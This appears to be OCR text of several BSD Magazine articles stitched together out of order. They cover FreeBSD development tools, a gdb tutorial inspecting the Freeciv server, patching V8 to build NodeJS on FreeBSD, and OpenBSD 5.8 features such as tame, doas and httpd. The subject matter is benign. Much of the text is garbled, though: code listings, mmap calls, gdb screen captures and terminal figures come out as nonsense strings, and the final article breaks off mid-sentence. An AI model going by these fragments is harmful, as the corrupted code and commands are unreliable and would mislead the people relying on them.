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#include <sys/param.h> = BSD defined, FreeBSD current version etc ... 


fle Getined (BSD) 

iP ALigOLUVCley S<idlencaLelere// aLiol sa 
#endif 

#include <sys/types.h> 
#include <sys/socket.h> 
#include <arpa/inet.h> 

Line 

die eel ae: Geigenel. Jelaveia “euaeny’ b-|) 


{ 


SIE ALigh wekelela. alia 
Sleliisne, deleveus, aljey = «uae Al lie 


Iie (GUE Oem VEL IEEE ajo. Gealial) 


Here we have a more complex case; for example, how do we get the MAC Address of an inter- 
face? 


In addition, FreeBSD provides a bunch of specific functions like stricpy/stricat (safer versions of 
strcpy/strcat) and strtonum family functions, all of which are available in the base, whereas Linux 
must install the separate BSD library to have them. If you have any doubts about any functions, 
all manpages are available and very well written. 
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FreeBSD is shipped by default with clang, whereas Linux relies on GCC suite. If you heavily use 
OpenMP, clang does not provide it yet so you might need to install GCC from ports. Somehow, 
clang mostly compiles faster and provides more informative warning and error messages. Fortu- 
nately, they share a significant amount of common flags. 


On Linux, you may use a custom memory allocator during your development, like jemalloc. It’s a 
very handy and useful library which allows you to generate statistics, to fill freed memory with spe- 
cific values, and to spot corrupted memory usage. 


Good news! You do not need to install it—FreeBSD libc’s malloc (aka phkmalloc) uses jemalloc 
internally. To print statistics from your application, for example, you need to include malloc_np.h 
instead of jemalloc/jemalloc.h 


As for the makefiles, this is the BSD format which differs from GNU style: 


A basic makefile for a library 


MAGAZINE 


24 


A basic makefile for an application: 


FreeBSD can handle GNU via (gnu)make, libtool, etc., via the ports. 


Or to save the effort of porting this part, it might be more handy to use cmake or scons. 


You might want to publish your library / application in pure FreeBSD’s path. You can make a port 
which can provide some options for the user. It can download the source and compile it with Its 
dependencies in a natural manner. In addition, you can build a binary package to facilitate the dis- 
tribution. 
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Example of a port Makefile: 


For instance, you can put the archive .tar.gz of the library in /usr/ports/distfiles, then type make 
checksum. Then, make install will compile and install it in /usr/local ... The handbook of making 
ports is very useful to read. 


Furthermore, you can build a binary version of this port to facilitate its distribution. Simply as it Is, 
pkg create mylib ... It will create a txz archive in the current folder ... In the end, pkg install mylib 


will install it ... 
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4. The conclusion 


Developing under FreeBSD is not the extreme challenge you might think it is. Even better, from 
coding to publishing, everything is thought out and made in a constant way without any external 
dependencies. If you want to go even further, like kernel development, again it is easy and in 
base. So there is no real reason to stay away from FreeBSD anymore, you are more than wel- 
come. 


; About Hardened BSD The following people and organizations 
| | have contributed to the HardenedBSD 
The HardenedBSD project was created in project: 


# 2014 by Oliver Pinter and Shawn Webb. 
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Development tools on FreeBSD 
by David Carlier 


If you're usually programming on Linux and you consider a 
potential switch to FreeBSD, this article will give you an 
overview of the possibilities. 


1. How to install the dependencies 


FreeBSD comes with either applications from binary packages or compiled from sources (ports). 
They are arranged by software types (programming languages mainly in lang (or java specifically 
for Java), libraries in devel, web servers in www ...) and the main tool for modern FreeBSD ver- 
sions is pkg, similar to Debian apt tools suite. Hence, most of the time if you are looking for a spe- 


cific application/library, simply 


pkg search <name> 
without necessarily knowing the fully qualified name of the package, it is somehow sufficient. 


For example 


[o) de msi —t- a Ongen ©) al ele 


will display phpd5d itself and the modules, furthermore php56 specific version and so on ... 


The main difference is, you are not forced to either choose the binary or the port but can have 
both if it suits your need, but keep in mind that compiling from source can take a certain amount 
of time to achieve, if that is an important point for you. If the ports tree is not already present on 
your server, portsnap fetch extract will fetch the ports tree for you by default in /usr/ports. Then re- 
lated to the software type described above, you just need to go to the related folder, for example, 


for installing phps: 
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Gl. (iste joie asy/ Inelcley/ einicrs 
make config-recursive 


make install clean 


The second command, depending which options you are going to choose, will display all the op- 
tions available for each dependency (for example, if gd support is enabled, the options for 
graphics/gd library will appear). 


However, most of the time, the binary packages are sufficient to cover most of the needs. 
2. Web development 


This is basically the easiest area to migrate to ... most Web languages do not use particular spe- 
cific platform features, so most of the time, your existing projects might just be “drop-in” use 
cases. 


If your language of choice is PHP, luckily this scripting language is workable in various operating 
systems, most of the Unixes and Windows. In the case of FreeBSD, you even have many differ- 
ent ports or binary package versions (5.4 to 5.6). In this particular case, you might need some 
specific PHP modules enabled, luckily they are available atomically or if the port is the way you 
chose, it is via the www/php5-extensions's one. 


Terminal — 
File Edit View Search Terminal Help 


php5-extensions-1.7 


bzip2 library support 
calendar conversion support 

CTYPE ctype functions 

CURI CURL support 

DBA dba support 

DON DOM support 

EXIF EXIF support 

FILEINFO fileinfo support 

! input filter support 

FTP support 
GD library support 
gettext Library support 
GNU MP support 


< kK > <Cancel> 


Figure 1: PHP port and modules 
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Of course, developing with Apache (both 2.2 and 2.4 series are available, respectively www/ 
apache22 and www/apache24 packages) or even better with Nginx (the last stable or the last de- 
velopment versions could be used, respectively www/nginx and www/nginx-devel packages) via 
php-fpm is possible. 


Outside of PHP, the same apply for Python / Django (www/py-django) and Ruby on Rails (www/ 
rubygen-rails), Python 2.7 and 3.5 (lang/python<version>) are available as Ruby until 2.2 (lang/ 
ruby<version>). 


In term of databases, we have the regular RDMBS like MySQL and PostgreSQL (client and 
server are distinct packages) ... databases/(mysql/portgresql)<version>-client and databases/ 
(mysql/postgresql)<version>-server) and the more modern concept of NoSQL with CouchDB, for 
example (databases/couchdb), MongoDB (databases/mogodb), Cassandra (databases/ 
cassandra) to name a few. 


Also, if you need to perform efficient Map / Reduce for Big Data work, you have the well known 
Apache Hadoop and Apache Spark (respectively devel/hnadoop and devel/spark) ... And last, if 
you ever need a search engine, Apache Solr/Lucene (textproc/apache-(solr/lucene)), Xapian 
(databases/xapian) and their various language bindings are available. 


Figure 2: PHP development under Netbeans 


Is it rather Java Web or any language based on the Java VM platform? In FreeBSD, you even 
have Java 8 (either java/openjdk8 and java/linux-oracle-jdk18), various popular frameworks and 
J2EE servers or servlet engines, like Spring (java/springframework), 
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Jboss (java/jboos<version>), Tomcat (www/tomcat<version>), Jetty (www/jetty)... Even the more 
modern languages like Scala (lang/scala), Groovy (lang/groovy) can be found. 


Two languages described above, Python and Ruby, have their Java VM counterparts, Jython 
(lang/jython) and Jruby (lang/jruby), available as well. 


In terms of Integrated Development Environment, there are still several choices. The venerable 
Netbeans (java/netbeans or java/netbeans-devel), Eclipse (java/eclipse ... side note, FreeBSD 
needs to have Kerberos support enabled, NO KERBEROS is /etc/make.conf or /etc/src.conf pres- 
ence needs to be checked) with their numerous popular plugins. 


3. Low level development 


The BSD are shipped with a C and C++ compilers in base. In the case of FreeBSD 10.2, it is 
clang 3.4.1 (in x86 architectures) otherwise modern versions of gcc, for developing with C++11, 
for example, are of course available too (lang/gcc<version> ... until gcc 5.2). 


Numerous libraries for various topics are also present, web services SOAP with gsoap through 
User Interfaces with GTK (x11-toolkits/gtk<version>), QT4 or QT 5 (devel/qt<version>), malware 
libraries with Yara (security/yara) ... 


In terms of IDEs, Eclipse and Netbeans described above allow both C/C++ development, Anjuta 
and Qtcreator are also available for important projects. If you prefer, FreeBSD has in base vi and 
Vi Improved can be found in ports / packages (editors/vim or editors/vim-lite without X11 support). 


Figure3. PHP development under Java Eclipse SDK. 


FreeBSD is a POSIX system, hence porting C/C++ code to this platform depends on the degree 
of portability of your projects, so the usage of specific “linuxisms’ and such. 


In case more information is needed about porting software in FreeBSD and its specific tools, | 
would recommend reading BSDMag issue numbers 66 and 68. 
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4. Android / Mobile development 


In order to be able to do Android development, to a certain degree, the Linux compatibility layer 
(aka linuxulator) needs to be enabled. Also x11-toolkits/swt and linux-f10-gtk2 port/package need 
to be installed (note that libswt-gtk-3550.so and libswt-pi-gtk-3550.so are needed, the current 
package is versioned as 3557, can be solved with symlinks). In worst case, remember that bhyve 
(or Virtualbox) are available and can run any Linux distribution smoothly ... 


Pactaeges Dols 


Andretd SOK Meneper Log 
. » 9 oss : 
instellieg Semples for SOK APT 25. revision 2 
: e 1 pees ° Ne ®. . 
or Andrei’ SOK, APU 21, revision I 
Seurtes for Andretd SOK, APT 75, revision | 

sied srcea tor Aras De AP a rey nmi 
Downloading Andretd TY ARM TARI via Syetem imege, Android AP 271, revision 2 
instetiieg Andrei’ TY ARM LABI w/a Syetem lmepe, Adreid APT 23, revision 2 


: ‘ 
4442 (8 


Figure 4: SDK Manager under FreeBSD 
5. Source Control Management 


FreeBSD comes in base with a version of subversion, as FreeBSD source is in a subversion re- 
pository, prefixed svnlite, though, to avoid conflicts with the package/port. 


In addition, Git is present but via the package/port system with various options (with or without a 
user interface, subversion support). 


6. Conclusion 


FreeBSD has made tremendous improvements over the years to fill the gap with Linux whereas it 
still Keeps its own interesting specificities, hence there won't be too many blockers if your projects 
are reasonably sized to consider a migration to FreeBSD. 
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To be able to inspect a program more easily, we need to 
have the symbol table available for the program we intend 
to debug. This is accomplished by using the —g flag of the 
compiler we are going to use (we could also debug it with- 
out the —g flag but it is really cumbersome sometimes). In 
our case we will use FreeBSD 10 as the platform and the 
clang compiler that comes with it. 


After a program is compiled using the —g flag, we are able to peek inside it using the gdb debug- 
ger to start a debugging session. All you need to type is the following: 


And we will see a (gdb) prompt. That means that we are ready to start typing gdb 


commands. 


Y covered Dy the GW 
ang tT 


Figure 1. gdb Commands 
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Or if the program we need to debug is currently running, we must type: 


Let's start with some basic commands and inspect a running application. For this example | have 
selected this application http://freeciv.wikia.com/wiki/Main_ Page. 


“Freeciv is a Free and Open Source empire-building strategy game inspired by the history of hu- 
man civilization. The game commences in prehistory and your mission is to lead your tribe from 
the Stone Age to the Space Age...” 


We will inspect the game structures at runtime with gdb. Let's follow these steps: 


¢ Edit /etc/make.conf and add the line WITH DEBUG=yes (this will not strip your binaries so you 
will have the symbol table and also add the debug flags to the compiler when compiling the 
sources of your ports) 


eInstall freeciv from ports 


eStart the freeciv server and client 
(freeciv-server and freeciv-gtk2) 


«Join your local game 


34 


MAGAZINE 


Now we will use our first gdb command: 


Figure 3. gdb command 


As we don't know anything about how Freeciv works, we will press CTRL-C. This will interrupt the 
program and we will take it from there. For starters, let’s interrupt and see where we are. If we 
want to continue the execution, we type ‘continue’ or ‘c. 


Figure 4. gdb command 


Here is a screenshot from the client program freeciv-gtk2. We need to join our local game as we 
are going to debug the server. 
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Figure 5. Screenshot from the client program freeciv-gtk2 
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The #<num> you see are the stackframes of simply called frames. When your program is started, 
the stack has only one frame, that of the function main. This is called the initial frame or the outer- 
most frame. Each time a function Is called, a new frame is made. Each time a function returns, 
the frame for that function invocation is eliminated. If a function is recursive, there can be many 
frames for the same function. The frame for the function in which execution is actually occurring 
is called the innermost frame. This is the most recently created of all the stack frames that still ex- 
ist. Let’s go into frame 3. To do this, we type either ‘frame 3 or ‘f 3’. 


conn list iterate(gaeme.all_ comm 


if (srverg.euth_enabled 
SA loconn->server.is_cl 
SB oconn->server .status 


auth process status( poco 


list iterate end 


if (S S RUNNING == server state() 44 game.info 
wold) send_server_info to metaserver( ME 
return $_E END OF TURN TIMEOUT - 


(on oOTroept © FF 
if (fc selecti@ax cesc + “enacts, Geritets, S&exceptts, &t 


‘void) send server info to metaserver( META REFRESH): 
if ‘game .into.timeout 
. 5 5 RUNNING == server _state( ) 
SS goee.server.pnase timer 
S4 (read timer seconds( game.server.onase tiser) 
Y game .info.seconds_to phaesedone) ) 
con prompt off! ); 
return S$ _E— END OF TURN Jas 


Figure 6. Innermost frame. 


It seems that the server is going to send us end of turn. Let's make sure to set a break point, the 
format 


3/ 
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Figure 7. Setting up the break point. 


lt seems we are wrong. Let's interrupt again and inspect the data at this point. 


Figure 8. Setting up the break point. 
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Typing ‘i lo means info locals which will display all local variables in this frame and their values, 
which is pretty handy. Let's take a look at something easier to see. Sometimes in freeciv, another 
civilization will try to negotiate terms with us. Looking at the source code, we find the add_clause 
function in the diptreaty.c source code. That function will add a term which will make the other 
part accept or reject our terms. 


+ a , - pr - ca 
f/usr/f/nome/cneira/worxshoo 


J ntreary 


freebsd-th Thread 8054064 In: add _clawse Line: 138 PC: OxsoocTo4i6 


Figure 9. Finding add_clause function. 


After playing a few minutes, we hit this break point. At this point, we don't even know which civili- 
zation has approach us to negotiate terms. Now we can know ahead of time as we set the break- 
point where the negotiation starts. 


39 


MAGAZINE 


FreeBSD CORNER 


? otreaty-solrl « otreat >pird): 


eensd-th Thread 8054064 In: add clause Line: 138 PC: Oxwsoocro4 36 


" 


Figure 10. Negotiation 


| assume the negotiation civilization should be in the pfrom pointer. 


Figure 11. Negotiation in the pfrom pointer. 


To print the variable’s values, we just type ‘p’. In this case, ‘p is a pointer to a player structure. If 
we want to check the definition of the player structure, we just type ‘ptype pfrom’ and the struc- 
ture definition will be displayed. 


yY~o =. KL player 
struct player_siot “slot; 
char name[48]; 
char username! 48]: 
char ranked_username(| 48]: 
int user_turns: 
Bool 18 male: 
Struct government *government: 
Struct government *target_government: 
Struct nation_type “nation; 
--Type <return> to continue, or q <return> to quit---§ 


Figure 12. Structure definition. 
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Now let's see what the values are for these fields for the demanding civilization. As the pfrom is a 
pointer, we need to use pointer notation to check its contents. 


Figure 13. Pointer notation. 


And there we go; the full dump for the player struct. 


Figure 14. Player struct. 


Looking at the player struct, it seems that the leader name is Roy Jenkins and looking at the back- 
trace (bt), the clause of the treaty seems to be “cease fire’, So we are going to be offered a peace 
treaty. 


Figure 15. Diplomacy suggest. 


To continue executing the program type ‘next or ‘n’ , something like this will be displayed in the 
diplomacy tab. 
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Game Ear View Select Uirt work Combat Ciiration Heb 


Iempiars 
| Master jacques de Molay 
Geld. : +> Add Clause... 
- Europeans 
Gad: 100 (40) Chief Roy Jenkins 
Tax: 40 Lize: © Ser: 60 Gold:  « ‘ “> Add Clause 


Accept treaty 9 Cancel meeting 


Figure 16. Diplomacy tab. 


What you cannot see in the screenshot is that | have requested an embassy in return for the 
cease-fire treaty, but here it is: 


reebscd-th Thread 8054064 In: add clause Line: 143 PC: OxsO0cTs 


ee ee 


Figure 17. Breakpoint 2. 
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Let's go line by line using next. You could also use the step command but if you use the step com- 
mand, it will take you inside a function call instead of just evaluating the function and returning 
like the next command. 


} otreaty.et 


Treebsd-th Thread 8054064 In: add clause Line: 1423 Pt: OwkOOcTO4sh4 


Figure 18. Step command. 


We are currently at line 143, | just checked what kind of data type was CLAUSE EMBASSY, it 
was an enum one (somewhat obvious). Using next a couple of times will get us here, where 


oOIiotreary ' 


166 if ¢Type «— CLAUSE EMBASSY 44 olavyer_has real esbassy(pto. ofrom)) 


Figure 19. Enum data. 
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Keep on typing ‘n’ and we will exit from the function call and arrive to handle_diplomacy_cre- 
ate clause_req 


Let's keep on typing ‘next’ 
and we will arrive to this func- 
tion call treaty evaluate. 
That seems interesting. 
Maybe here the results of re- 
jection or acceptance of con- 
ditions are done. As | ex- 
plained earlier, we can step 
into this one using the step 
command 


reensd-th Thread 8054064 In: handie diplomacy_create_clawse ree Line: 697 Pt: Oxesooaesd$i7 


Figure 21. call_treaty_evaluate 
function. 


To ihand.«< 


reehsd-th Thread 8054064 In: cal)_treaty_evaluate Line: 7% PC: OxsOOa7dI14 
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Let's step all the way to get to another point in the program execution. After a couple of steps we 
are here 


mT Total balance « O: 


eebsad-th Thread 8054064 In: dal_treaty_evaluate Line: $7 Ph: OxbO0094a917 


“e ' : 


Figure 22. Program execution. 


SO a quick glance at the source code tells us that the total_ balance variable is somewhat impor- 
tant to evaluate if a clause is accepted (In our case we are requesting to give us an embassy). In- 
stead ofprinting this variable multiple times, let’s leave it available in the display. 


Then we set a breakpoint somewhere ahead of advdiplomacy.c:621. We can see that the to- 
tal_ balance value is displayed and it is -450—seems bad for our proposal. 
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reebsd-th Thread 8054064 In: dai_treaty_evaluate Line: 6271 PC: Ox80004ac1 


Figure 23. breakpoint on advdiplomacy.c:621. 


As we can see, total balance >=0 is the condition to approve the proposal. This is a review of the 
commands used in this session: 
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Print values and names of all 
local variables in the current 
scope. 
A backtrace is a summary of 
how your program got where 
it is. It shows one line per 
frame, for many frames, 
starting with the currently 
executing frame (frame zero), 
followed by its caller (frame 
one), and on up the stack. 
The call stack is divided up 
into contiguous pieces 
called stack frames, or 
frames for short; each 
frame is the data associated 
frame <frame number> f <frame number> with one call to one 
function, The frame 
contains the arguments 


given to the function, the 
function's local variables, 
and the address at which 
the function is executing. 


print <variable> p <variable> displays the value of the 
variable 


Will automatically print the 
display <variable> disp <variable> value of the variable being 
displayed as long as it is 
within the scope 
n 


Will enter gdb in tui (text 
user interface) mode if we 
did not entered in the first 
place. Default layout is 
source at the top commands 
at the bottom. 

Execute next line of code. 
Will not enter functions. 
You can use as parameter 
next the number or times to 

n <number of next to execute next 


step s Step to next line of code. 
s <number of steps to Will step into a function. 
perform> 


Figure 24. Basic commands 
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Now that we have used the display command or the print command, it is getting pretty tedious to 
manually inspect a variable or data structure by typing ‘p or display every time we hit a break- 
point we have set. There is a command called commands to save us from all this typing. 


First we set a breakpoint where we want to automatically inspect data. In this case I'll check one 
of the city functions. 


Now we can type the following: 


Type commands for when breakpoint 4 is hit, one per line. 
End with a line saying just “end”. 


> 


After you have set the instructions to be executed after the breakpoint is hit, you could modify 
them or just erase them like this 


Type commands for when breakpoint 4 is hit, one per line. 


End with a line saying just “end”. 


Now if you want to execute something: 
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Type commands for when breakpoint 4 is hit, one per line. 


End with a line saying just 


Now we can type all the instructions we want to be executed when this breakpoint is hit. Usually, 
we use print to display values, but there is a more powerful function called printf that uses a simi- 
lar format as the C-language function 


As in C printf, ordinary characters in template are printed verbatim, while conversion specification 
introduced by the ‘% character causes subsequent expressions to be evaluated, their values con- 
verted and formatted according to type and style information encoded in the conversion specifica- 
tions, and then printed. 


For example, you can print two values in hex like this: 


printf supports all the standard C conversion specifications, including the flags and modifiers be- 
tween 


the ‘% character and the conversion letter, with the following exceptions: 

The argument-ordering modifiers, such as ‘2$’, are not supported. 

The modifier ’ is not supported for specifying precision or width. 

The ” flag (for separation of digits into groups according to LC NUMERIC’) is not supported. 
The type modifiers ‘hh, ‘|’, t, and ‘z’ are not supported. 


The conversion letter ‘n’ (as in “%on’) is not Supported. 


The conversion letters ‘a’ and ‘A are not supported. 


MAGAZINE 


49 


Note that the ‘Il’ type modifier is supported only if the underlying C implementation used to build 
GDB supports the long long int type, and the ‘L type modifier is supported only if long double type 
is available. 


As in C, printf supports simple backslash-escape sequences, such as \n, ‘\t", ‘\V, ‘\V", ‘\a, and ‘Wf, 
that consist of backslash followed by a single character. Octal and hexadecimal escape se- 
quences are not supported. 


Additionally, printf supports conversion specifications for DFP (Decimal Floating Point) types us- 
ing the following length modifiers together with a floating point specifier. letters: 


‘H’ for printing Decimal32 types. 
‘D’ for printing Decimal64 types. ‘DD’ for printing Decimal128 types. 


If the underlying C implementation used to build GDB has support for the three length modifiers 
for DFP types, other modifiers such as width and precision will also be available for GDB to use. 


In case there is no such C support, no additional modifiers will be available and the value will be 
printed in the standard way. 


Here's an example of printing DFP types using the above conversion letters: 


— ] BH BE P ! 
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sometimes, it’s better to put most of the type we will need to take a look at in the contents of dy- 
namically allocated arrays (the ones created by malloc and calloc system calls) 


For example we have the usual static memory array:char t[8001]; 


It's easy to display its contents using 


But what about this one: 
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This command will print 25 elements from the array t, the format is pointer@<number of ele- 
ments. 
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When we compiled our program with the —g flag, we instructed the compiler to generate a symbol 
table in our program binary, and this table contains variable names, function names and types. 
Now let's Suppose we want to Know the names of all the functions available. We could use one of 
the info family commands: 


This command will print the names and data types of all defined functions. If we want to check 
only the function names matching a regexp we use the command: info functions <regexp> 


For example : 


Will match all functions that have city string in their name, you must use grep regexp not perl's re- 
Qexp 


The same goes with variables with the command: 
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Print the names and data types of all variables that are declared outside of functions (not the lo- 
cal variables). 


Also the same syntax for info variables regexp (gdb) info variables city 


Print the names and data types of all variables (except for local variables) whose names contain 
a match for regular expression regexp. 


Describe where the data for symbol is stored. For a register variable, this says which register it is 
kept in. For a non-register local variable, this prints the stack-frame offset at which the variable is 
always stored. Note the contrast with print &symbol’, which does not work at all for a register vari- 
able, and for a stack local variable prints the exact address of the current instantiation of the vari- 
able. 


Print the data type of expression exp. exp is not actually evaluated, and any side-effecting opera- 
tions (Such as assignments or function calls) inside it do not take place. Any kind of constant, vari- 
able or operator defined by the programming language you are using is valid in an expression in 
GDB. 


Print the data type of $, the last value in the value history. 


Print a description of data type typename. typename may be the name of a type, or for C code it 
may have the form ‘class class-name,, struct struct-tag’, union union-tag’ or enum enum-tag. 
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Print a description of the type of expression exp. ptype differs from whatis by printing a detailed 
description, instead of just the name of the type. For example, for this variable declaration: 


The two commands give this output: 


As with whatis, using ptype without an argument refers to the type of $, the last value in the value 
history. 


Print a brief description of all tyoes whose name matches regexp (or all types in your program, if 
you supply no argument). Each complete typename is matched as though it were a complete 
line; thus, i type value’ gives information on all types in your program whose name includes the 
string value, but ‘i type “value$’ gives information only on types whose complete name is value. 


This command differs from ptype in two ways: first, like whatis, it does not print a detailed descrip- 
tion; second, it lists all source files where a type is defined. 
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Show the name of the current source file—that is, the source file for the function containing the cur- 
rent point of execution—and the language it was written in. 


Print the names of all source files in your program for which there is debugging information, or- 
ganized into two lists: files whose symbols have already been read, and files whose symbols will 
be read when needed. 


Print the names and data types of all defined functions. 


Print the names and data types of all defined functions whose names contain a match for regular 
expression regexp. Thus, info fun step’ finds all functions whose names include step; 


‘Info fun “step’ finds those whose names start with step. 


Print the names and data types of all variables that are declared outside of functions (i.e., exclud- 
ing local variables). 


Print the names and data types of all variables (except for local variables) whose names contain 
a match for regular expression regexp. 


Ta, | |p ee ere 
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In GDB we have three ways of interrupting the program flow and inspect what we need; break- 
points, watchpoints and catchpoints. 


A breakpoint stops the execution at a particular location within the program. We have temporary 
breakpoints, regexp breakpoints and we could set conditional breakpoints. 
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The usual breakpoint: 


his one stops at line 3 of the current source file being executed. 


The temporary breakpoint is a simple breakpoint that is deleted after it is hit, the command for 
this Is: 


The regexp breakpoint sets breakpoints at the functions matching the regexp provided 


(gdb) rbreak “cityConditional breakpoint, stops the execution of the program only if the condition 
is met 


Yes, you could use the C library functions as long as your program is linked against libc. 
You can enable or disable breakpoints with the following command: 
enable once — Enable breakpoints for one hit 


enable delete — Enable breakpoints and delete when hit 
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Yes, you could use the C library functions as long as your program is linked against libc. 
You can enable or disable breakpoints with the following command: 
enable once — Enable breakpoints for one hit 


enable delete — Enable breakpoints and delete when hit 


A watchpoint stops the execution when a particular memory location (or an expression involving 
one or more locations) changes value. Depending on your system, watchpoints may be imple- 
mented in software or hardware. GDB does software watchpointing by single-stepping your pro- 
gram and testing the variable’s value each time, which is hundreds of times slower than normal 
execution, but it’s really useful if you really don’t have a clue of where the problem is in your pro- 
gram. 


The syntax for this command is 


A catchpoint stops the execution when a particular event occurs. The event could be one of the 
following 


Raised signals may be caught: 
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Raised signals may be caught: 


catch signal — all signals 

catch signal <signame> — a particular signal 

Raised exceptions may be caught: 

catch throw -— all exceptions, when thrown 

catch throw <exceptname> — a particular exception, when thrown 
catch catch — all exceptions, when caught 

catch catch <exceptname> — a particular exception, when caught 
Thread or process events may be caught: 

catch thread_ start — any threads, just after creation 

catch thread_exit — any threads, just before expiration 

catch thread_join — any threads, just after joins 

Process events may be caught: 

catch start — any processes, just after creation 


catch exit — any processes, just before expiration 


catch fork — calls to fork() 


catch vfork — calls to vfork() 

catch exec — calls to exec() 

Dynamically-linked library events may be caught: 
catch load — loads of any library 

catch load <libname> — loads of a particular library 
catch unload — unloads of any library 


catch unload <libname> — unloads of a particular library 
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The act of your program's execution stopping may also be caught: 


C++ exceptions may be caught: 


catch throw -— all exceptions, when thrown 


catch catch — all exceptions, when caught 


You can enable and delete breakpoints, watchpoints and catchpoints with the enable and delete 
command. 


About the Author: 


Carlos Neira has worked about ten years as a software i 
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NodeJS and FreeBSD - Part 1 


by David Carlier 


Nodejs is well Known to allow building server applications 
in full JavaScript. In this article, we’ll see how to build 
nodejs from source code on FreeBSD. You will need auto- 
conf tools, GNU make, Python, linprocfs enabled and 
libexecinfo installed. GCC/G++ compiler suite (C++11 compli- 
ant, ideally 4.8 series or above) or possibly clang can be 
used to compile the whole source. 


To start, we need the NodeJS source code from this url hitp://www.nodejs.org/dist/latest where 
we can find this archive (during the article writing, the last version known is 0.12.2), 
node-v<version>.tar.gZ. 


Be prepared to be patient, you have enough time for a cup of coffee, the compilation time needed 
can be quite long... 


Once downloaded and extracted, the famous command trio needs to be typed: 


./configure --dest-os=freebsd 


gmake 


gmake install 


It's pretty straightforward on first glance. On FreeBSD, when v8 is compiled we get some compila- 


tion errors: 
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/platform/platform-freebsd.o 
../deps/v8/src/base/platform/platform-freebsd.cc 


../deps/v8/src/base/platform/platform-freebsd.cc:159:11: error: mem- 


ber reference base type ‘int' is not a structure or union 
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4 errors generated. 


Ok, so a result variable ought to be a std::vector but it's considered wrongly as an int and further- 


more a wrong mmap flag is used. Let's fix it! 
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Let's have a look at the mmap problem. 


MAP _NORESERVE Is a specific flag which guarantees no swap space will be used for the map- 
mmap (OS: :GetRandomMmapAddr (), 
S1ze, 


PROT NONE, 


MARE RS Mea Sa NON SM APSO Eo Hin Vy 


kMmapFd, 


kMmapFdOffset) ; 
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mmap (OS: :GetRandomMmapAddr (), 
S1ze, 
PROT NONE, 
We! IVE, [IEE FINIOIN 
kMmapFd, 
kMmapFdOffset) ; 
void* reservation = mmap(0OS::GetRandomMmapAddr (), 
BeCwes ys lac, 
PROT NONE, 
WIRE ER YEN IBID, | WEE ENQUIRE: INO) EsIeh Su ehilsVA eh 
kMmapFd, 


kMmapFdOffset) ; 


void* reservation = mmap(O0S::GetRandomMmapAddr (), 


Begquesieesiae, 


PROT NONE, 
Mee JUNI RUNES ZaINIOIN 
kMmapFd, 


kMmapFdOffset) ; 
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Once modified in every mmap call, we can now retry compiling. However, we get another compila- 
tion error. This time, it casts a pthread_ self returns call to an int. 


The problem is, on FreeBSD, a pthread _t type is not an integral type at all but an opaque 
Struct.... 


Instead, we might replace this line by: 


Now we are finally able to compile. After a couple of minutes, it is finished but we have still one 
source to update: lib/dns.js. Add these two lines after line 127: 


Because FreeBSD does not support this flag, it ought to be cleared. 


This is all for compilation and it is ready to be used. Next time, we'll have an overlook in the appli- 
cation’s building part and ought to see the potential of this library. 


This article comes from Vol.09, No.04 issue. Second 
you can find in Vol.09, No.05 
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OpenBSD 5.8, special release 


by David Carlier 


Indeed, this release is special mainly because it was to cele- 
brate the 20th anniversary of existence of OpenBSD, hence 
it was out before the usual schedule (18th of October for in- 
stance). It, of course, comes with many new interesting fea- 
tures. 


History brief 


OpenBSD project was created by Theo de Raadt in 1995; it is a BSD flavor which focuses on se- 
curity, hence provides several built-in mitigation techniques, enforced policies (ASLR, the Write 
XOR Execute memory protection policy, privilege separations ...) and portability. It can be freely 
downloaded or purchased via openbsdstore.com. It brought the introduction of now well known 
software, openssh, pf (Packet Filter), IPSec stack ... OpenBSD releases happen twice a year, the 
1st of May and the 1st of November, each release supported for one year. 


New features 
a. tame 


tame (note: it will be renamed pledge for the 5.9 release) is a security feature which narrows 
down the attack's surface of an application. Linux has seccomp-bpf and FreeBSD has Capsicum, 
for example, which are more or less the comparable features. Theo de Raadt preferred somehow 
to choose a completely different approach than those (note: Capsicum works with file descriptor 
to limit an application whereas seccomp-bpt filters the system calls automatically). In the case of 
the tame, an application has a class of authorized functions to use and every attempt to over- 
come this lead to the termination of this application, the process is killed or aborted with a produc- 
tion of a core dump. Let's take a simple example, the whois command line. It must be able to do 
some DNS requests and network syscalls. 


# whois example.com 
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Whois Server Version 2.0 
Domain names in the .com and .net domains can now be registered 
with many different competing registrars. Go to http://www.internic.net 


for detailed information. 


Now, let's imagine | wish to debug whois via the new available valgrind from ports. Valgrind needs 
to create a process for this purpose and because whois does not allow it, it fails. 


Killed 
b. doas 


acts as a fair sudo replacement, developed by Ted Unangst. Sudo gains complexity over the re- 
leases and can be a problem for an application for the base system. Also, the author of doas ex- 
perienced some issues during his usage, whereas the sudo policies got updated. 


MAGAZINE 


67 


Here a sample of a doas.conf file ... 


The first allows charlie to use the shutdown command as admin user, whereas the second line for- 
bids all users from simpleusers group to do anything in the system. Doas is sufficient for most sim- 
ple cases regarding its grammar from the man page ... permit|deny [options] identity [as target] 
[cmd command [args ...]]. However, if you had set a complex sudo configuration, it is still avail- 
able via the ports / binary packages. 


c. ssh/sshd 


The famous ssh server and client got numerous fixes and improvements. One of the most notice- 
able is the new default cipher, chacha20-poly-1305 which combines Chacha20 and Poly1305, for 
authenticated encryptions. A new PubkeyAcceptKeyTypes option to set which public key types 
are allowed during user authentication, as DSA keys are now disabled by default, adding Pubkey- 
AcceptKey Types ssh-dss in the config would re-enable it. 


d. httpd 


httpd is the base web server since the 5.7 release, replacing nginx and the venerable apache be- 
fore. 


Apache was judged too obsolete (it was a heavily patched version of the 1.3.x series) and that 
was the main reason of its removal. Nginx was chosen as a fair replacement. However, even 
nginx was shipped on OpenBSD with some custom security patches and nginx itself was getting 
more and more complex in term of features and codebase. Hence, Reyk Floeter, worked on a 
new web server specifically for OpenBSD with only what it is considered to be important features 
(serving static content then furthermore, supporting Fast CGI protocol) with security the priority 
over pure performance. 
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For this release, httpd gains a new feature, rewrite support but not with regex, unlike other web 
servers implemented, but rather with pattern matching. For example, an httpd configuration for a 
url rewrite would be written as below. 


With all those appealing features, it is now time to proceed to the installation. Once the media 
boots, it gives the possibility to either update an existing installation, install a new one or drop into 
a shell. 
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a. Encrypting the disk 
One of the reasons to drop into a shell is, for example, encrypting the disks via softraid. 


The first step is to type fdisk -iy <device> which will reset the partition table data, the y flag is to 
avoid the interactive mode. Then disklabel -E <device> which will launch the interactive label edi- 
tor to allow creating the partitions and their types. So type the command ‘a’ to create a new parti- 
tion, which will ask the start offset, the size (can be set in term of megabytes, gigabytes ... as well 
...). IN Our Case, we need, at least, a swap partition, a normal BSD4.2 one and in the end the 
RAID type which will contain the encrypted partitions. 


Last, we encrypt via the command bioctl -r <number of rounds, a good number is advised for ex- 
